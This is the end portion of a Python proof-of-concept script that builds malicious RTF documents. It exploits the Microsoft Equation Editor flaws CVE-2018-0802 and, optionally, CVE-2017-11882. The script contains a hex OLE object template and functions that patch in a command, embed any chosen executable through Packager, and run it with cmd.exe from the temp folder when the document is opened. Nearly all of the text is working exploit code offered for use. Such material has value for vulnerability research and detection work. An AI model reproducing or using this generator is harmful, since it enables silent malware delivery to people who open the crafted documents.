ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000 0000000000000000000000000000000000000000000000000000001400000000000000010043006f 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000 00000000000000000000000000000000000000000000000000000000000000010000006600000000 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff ffffff00000000000000000000000000000000000000000000000000000000000000000000000003 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffff01000002080000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000 00000000000000000000000000000000000000000000000000000000000000000000000000030004 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141120c4300000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000004500710075 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000 0000000000000000000000000000000000000000000000000000000000000004000000c500000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff ffffff00000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000ff ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00 ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff 7cef1800040000002d01010004000000f0010000030000000000 """ def create_ole_exec_primitive(command, objdata_template, command_offset, max_len): if len(command) > max_len: raise ValueError("primitive command must be shorter than %d bytes" % max_len) hex_command = command.ljust(max_len).encode("hex") objdata_hex_stream = objdata_template.translate(None, "\r\n") ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):] return OBJECT_HEADER + ole_data + OBJECT_TRAILER def create_rtf(header, trailer, executable, double): # CVE-2018-0802 exploit ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126) p = Package(executable) package = p.build_package() outbuf = header + package + ole1 if double: # CVE-2017-11882 exploit outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43) return outbuf + trailer if __name__ == '__main__': parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method") parser.add_argument("-e", "--executable", help="File to ebmed and exec", required=True) parser.add_argument('-o', "--output", help="Output exploit rtf", required=True) parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true") args = parser.parse_args() with open(args.output, 'w') as f: f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double)) print "[+] Completed!"